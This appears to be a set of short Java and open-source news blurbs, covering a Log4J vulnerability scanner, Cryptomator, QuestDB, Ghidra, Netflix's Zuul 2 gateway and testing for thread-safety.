We have been researching the Log4J RCE (CVE-2021-44228) since it was released, and we worked in preventing this vulnerability with our customers. We are open-sourcing an open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability. This shall be used by security teams to scan their infrastructure for Log4J RCE, and also test for WAF bypasses that can result in achiving code execution on the organization’s environment.
This may seem silly at first, but DeepfakeHTTP actually has a bunch of interesting use cases:
- Creating the product PoC or demo before even starting out with the backend
- REST, GraphQL, and other API prototyping and testing
- Hiding critical enterprise infrastructure behind a simple static facade
- Hacking and fine-tuning HTTP communications on both server and client sides
This cool open source project provides transparent client-side encryption to be used with your cloud file storage of choice. Which choices, you ask?
Works with Dropbox, Google Drive, OneDrive, MEGA, pCloud, ownCloud, Nextcloud and any other cloud storage service which synchronizes with a local directory
Cryptomator works with Dropbox, Google Drive, OneDrive, ownCloud, Nextcloud and any other cloud storage service which synchronizes with a local directory. Since it’s open source, you can check for backdoors. Since it’s entirely client-side, you don’t have to trust anybody else’s machines.
Johan Vos joined us to talk about his new book ‘Quantum Computing for Developers’ which is available to read right now as part of the Manning Early Access Program (MEAP). Listen near the end of the show to learn how you can get a free copy or check the show notes for details. We talked with Johan about the core principles of Quantum Computing, the hardware and software involved, the differences between quantum computing and classical computing, a little bit of physics, and what can we developers do today to prepare for the perhaps-not-so-distant future of Quantum Computing.
Our approach comes from low-latency trading; QuestDB’s stack is engineered from scratch, zero-GC Java and dependency-free.
QuestDB ingests data via HTTP, PostgresSQL wire protocol, Influx line protocol or directly from Java. Reading data is done using SQL via HTTP, PostgreSQL wire protocol or via Java API. The whole database and console fit in a 3.5Mb package.
According to the great knowledge base in the sky, NewSQL is, “a class of relational database management systems that seek to provide the scalability of NoSQL systems for online transaction processing workloads while maintaining the ACID guarantees of a traditional database system.”
It’s not fully open source yet, but there’s a placeholder repo which states:
Be assured efforts are under way to make the software available here. In the meantime, enjoy using Ghidra on your SRE efforts, developing your own scripts and plugins, and perusing the over-one-million-lines of Java and Sleigh code released within the initial public release.
Why cold storage? Because security:
For security purposes, Square stores a reserve of Bitcoins in an offline setting. By having these funds offline, we reduce attack surface and hence risk of theft.
Square can move the funds offline at any time, but moving them back online requires a multi-party signing ceremony. They can also embed programming logic into the cold storage modules, so that only Square-owned addresses can receive the funds. That’s defense-in-depth, right there.
Bitcoin’s latest bull run is over, but those who believe in decentralized money continue to toil away… building the future they want to exist.
So you have built a shiny Java library and want to share it with the world?
Nice intro for beginners. 👌
A visual explanation on why model objects are not a good practice in object-oriented software.
It is explained that a developer’s job should be the one of an engineer, instead of the one of a manual worker (I would say even the one of a puppeteer, but I don’t like the rhyme); objects should be alive and have behaviour of their own rather than being mere models surrounded by tools, artificial ways of making them act as if they were alive.
Netflix open sourced their cloud gateway:
The Cloud Gateway team at Netflix runs and operates more than 80 clusters of Zuul 2, sending traffic to about 100 (and growing) backend service clusters which amounts to more than 1 million requests per second.
Pretty impressive. Click through to get the details of how Zuul 2 works and how they use it inside Netflix. I love when companies who are operating at webscale (😏) share their practices and code with the rest of us.
Thread-safety is an important quality of classes in languages/platforms like Java, where we frequently share objects between threads. The issues caused by lack of thread-safety are very difficult to debug, since they are sporadic and almost impossible to reproduce on purpose. How do you test your objects to make sure they are thread-safe? Here is how I’m doing it.
Great details on a particularly difficult aspect of testing. ✨